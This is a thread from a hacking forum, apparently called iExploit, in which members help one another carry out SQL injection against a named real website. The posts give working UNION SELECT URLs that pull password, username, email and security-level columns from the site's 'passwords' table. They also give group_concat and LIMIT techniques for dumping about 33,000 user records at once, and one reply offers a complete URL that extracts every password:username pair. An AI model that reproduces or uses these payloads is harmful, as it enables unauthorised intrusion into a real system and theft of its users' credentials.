iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
SQLi help?
  • gringoire
    Posts: 12
    I got to here:


    http://www.connectionsmag.co.il/article ... e,0x7c,ema​iladdress,0x7c,firstname,0x7c,lastname,0x7c,securitylevel),6,7+from+passwords+li​mit+0,1--
    http://www.connectionsmag.co.il/articlenav.php?id=1163+AND+1=2+UNION+SELECT+1,2,3,4,concat(upassword,0x7c,username,0x7c,emailaddress,0x7c,firstname,0x7c,lastname,0x7c,securitylevel),6,7+from+passwords+limit+0,1--


    Now technically i should increment 0,1 to 1,1 2,1 3,1 etc, and it's supposed to give me the info.
    It does, but is there a way to do it faster?
    If for example I got a table with ~33000 users.
    I'm not going to manually increment it manually.
    Is there a faster way to do it, like listing them on the page?
    I know the db name, table name, column name.
    Ideas?

    Someone pointed me at darkmysqli, which gives me this:

    [+] Dumping data from database \"None\" Table \"passwords\"
    [+] and Column(s) ['securitylevel', 'lastname', 'firstname']
    Traceback (most recent call last):
    File \"darkmysqliSH.py\", line 841, in <module>
    match = match[0][2:].split(\"\x1e\")
    IndexError: list index out of range



    EDIT:
    Nevermind, figured it out.
    http://goo.gl/1l26h
    group_concat (from here http://www.iexploit.org/community/showt ... +injection) and 0x0A as newline character.
  • nu11byte
    Posts: 53
    Very nice. I actually wondered about this same problem. All this time I have been doing it the long way... :(
  • Osirys
    Posts: 3
    LIMIT 9,10
    shows you the first 10 rows, all printed together.
    LIMIT x,z ; work on 'z'.
    See also group_concat() in MySQL
  • peann
    Posts: 14 
    http://www.connectionsmag.co.il/articlenav.php?id=1163+AND+1=2+UNION+SELECT+1,2,3,4,group_concat(upassword,0x3a,username),6,7+from+passwords--
  • Sh3llc0d3
    Posts: 1,910
    Can I point it out :p

    EDIT:
    Nevermind, figured it out.
    http://goo.gl/1l26h
    group_concat (from here http://www.iexploit.org/community/showt ... +injection)) and 0x0A as newline character.



    (from bottom of OP)
Add a Comment